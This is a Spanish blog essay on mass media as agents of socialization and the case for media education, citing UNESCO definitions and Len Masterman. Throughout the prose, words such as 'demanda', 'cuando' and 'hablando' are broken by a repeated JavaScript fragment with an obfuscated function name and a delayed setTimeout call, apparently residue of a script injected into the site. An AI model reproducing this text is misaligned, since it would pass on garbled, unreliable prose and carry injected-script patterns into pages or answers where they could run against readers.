LOS MEDIOS DE COMUNICACIÓN SOCIAL, IMPORTANTES AGENTES DE SOCIALIZACIÓN

Autora: Ana María Vega Llano

La influencia de los medios de comunicación en la educación de hoy da lugar a un nuevo tipo de alumnado, y por ende de profesor y de escuela. Se trata de una situación que demandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda un nuevo tipo de alumno (mucho más crítico y autónomo) que no habría recibido únicamente la información de la escuela y que poseería una buena cantidad de conceptos inducidos llegados a través de los medios; de una escuela moderna y de un docente formado en un campo que sobrepasa las disciplinas tradicionales en las que normalmente se ha encasillado la educación.

La primera formulación histórica de la Unesco sobre Educación para el uso de los medios de comunicación centraba la finalidad de la misma en el logro de un objetivo básico, perfectamente diferenciable del uso de los Media como auxiliares didácticos: “por educación en materia de comunicación cabe entender el estudio, la enseñanza y el aprendizaje de los medios modernos de comunicación y de expresión a los que se considera parte integrante de una esfera de conocimientos específica y autónoma en la teoría y en la práctica pedagógica, a diferencia de su utilización como medios auxiliares para la enseñanza y el aprendizaje en otras esferas del conocimiento como las matemáticas, la ciencia y la geografía”.

La diferencia no es en absoluto gratuita ni infundada, en la medida que supone una toma de posición crítica ante el presumible intento de la escuela de asimilar simplemente los medios de comunicación a su tarea formativa, por el interés que le merecen sus contenidos, y sin asegurar la formación suplementaria que precisa su uso.

Sin duda, la introducción de estos medios debe redundar en beneficio de la formación de los escolares en un aspecto que ha de ser básico para su formación posterior, como ya lo ha sido para su formación inicial.

Tal consideración de la Educación para el uso de los Mass Media contradice el carácter auxiliar al que generalmente la práctica escolar condena a los medios. Se habla, no lo olvidemos, de una “esfera de conocimientos específica y autónoma en la teoría y en la práctica pedagógica” que debe ser objeto, por tanto, de una atención directa, y cuya finalidad última no debe ser el uso eventual sino la formación de receptores críticos y autónomos.

Nos encontramos, pues, con un objetivo perfectamente identificado, en torno al cual se estructura y organiza todo un complejo de conocimientos, procedimientos y actitudes referidos a la cultura de estos medios, que constituyen un tema de gran incidencia en los procedimientos de trabajo de la escuela actual.

Por otra parte, existen razones que justifican la necesidad de la Educación para el uso de los medios y que tienen que ver con la importancia sociológica de estos medios, con las demandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andas sociales al  sistema educativo con respecto a ellos y con las propias características de los Medios de Comunicación Social. En este último caso se orienta el segundo texto de la Unesco cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando considera que junto a “…todas las formas de estudiar, aprender y enseñar a todos los niveles y en toda circunstancia, la historia, la creación, la utilización y la evaluación de los medios como artes prácticas y técnicas”, es preciso estudiar también “…el lugar que ocupan los medios de comunicación en la sociedad, su repercusión social, las consecuencias de la comunicación mediatizada, la participación, la modificación que producen en el modo de percibir, el papel del trabajo creador y el acceso a los medios de comunicación”.

De hecho, uno de los mejores especialistas en estos temas, Len Mastermann, explica que la prensa puede ser considerada como un “útil pedagógico complementario” al servicio de la escuela y de la enseñanza, pero también se le puede examinar como un hecho de la sociedad que ha de ser analizada en sí misma a fin de permitir al alumno tomar distancias críticas. Además, si se ha de formar al espectador, al oyente, se debe formar también al lector: aprender a leer es una técnica de base inculcada a cada escolar: aprender a saber leer un periódico es una pedagogía nueva y esencial que podría ser una premisa para la utilización documental de la prensa en la escuela. Pero no sólo de la prensa estaríamos hablandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sino también de la propia radio, de la televisión, del cine o de las famosas TICs.

Sin duda, nos referimos ya no a meros recursos o soportes auxiliares, sino a elementos configuradores de una nueva relación profesor- alumno, aula, medio ambiente, contenidos, objetivos, etc., incidiendo en los procesos cognitivos y actitudinales de los alumnos y transformandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando incluso los roles de las mismas instituciones docentes. Tienen un gran interés para el trabajo escolar ya que pueden constituirse en técnicas y recursos que permiten activar los conocimientos previos de los alumnos y confrontarlos con las nuevas informaciones. Pero, independientemente de las utilidades que se les adjudiquen, deben servir para la formación de los receptores en el uso de unos instrumentos que han de tener una gran repercusión en su vida presente y futura.

Además, y teniendo en cuenta estas consideraciones, la escuela asume su posición relativa en el mundo de la información, y con ella encuentra una nueva funcionalidad, más orientada a la labor de organizar los conocimientos previos adquiridos por los alumnos, que a la transmisión de información que se realizaría por otras vías, además de la suya propia.

En este sentido, hablaríamos de una nueva forma de resolver la compatibilidad de la escuela y la sociedad favoreciendo un cierto grado de concordancia entre ambos extremos. El modelo escolar no se cerraría sobre sí mismo sino que aceptaría el entorno como escenario y factor determinante del proceso de educación y comunicación escolar con lo que esto conlleva: mayor atención a la investigación del presente y de la actualidad. Se aceptan, asimismo, las capacidades del receptor y no se niegan en ningún momento.

En cualquier caso, el hecho inequívoco es que los Medios de Comunicación Social son el principal medio de socialización del niño, junto con la escuela y la familia, y la necesidad de ellos vendría dada por la aparición de un nuevo tipo de alumno que no habría recibido únicamente la información de la escuela y que poseería una buena cantidad de conceptos inducidos llegados a través de los medios de comunicación.

Así que será esta situación la que demandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande una escuela consecuente y un docente formado en un campo que sobrepasa las disciplinas tradicionales en las que normalmente se ha encasillado la educación.

BIBLIOGRAFÍA:

-       http//mediascopio.org/EducacionMC. Htm

-       Consejo Internacional de Cine y televisión (CICT). 1973. Unesco. París

-       1991. Los Medios de comunicación a la enseñanza. Uned. Madrid, pág.6

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.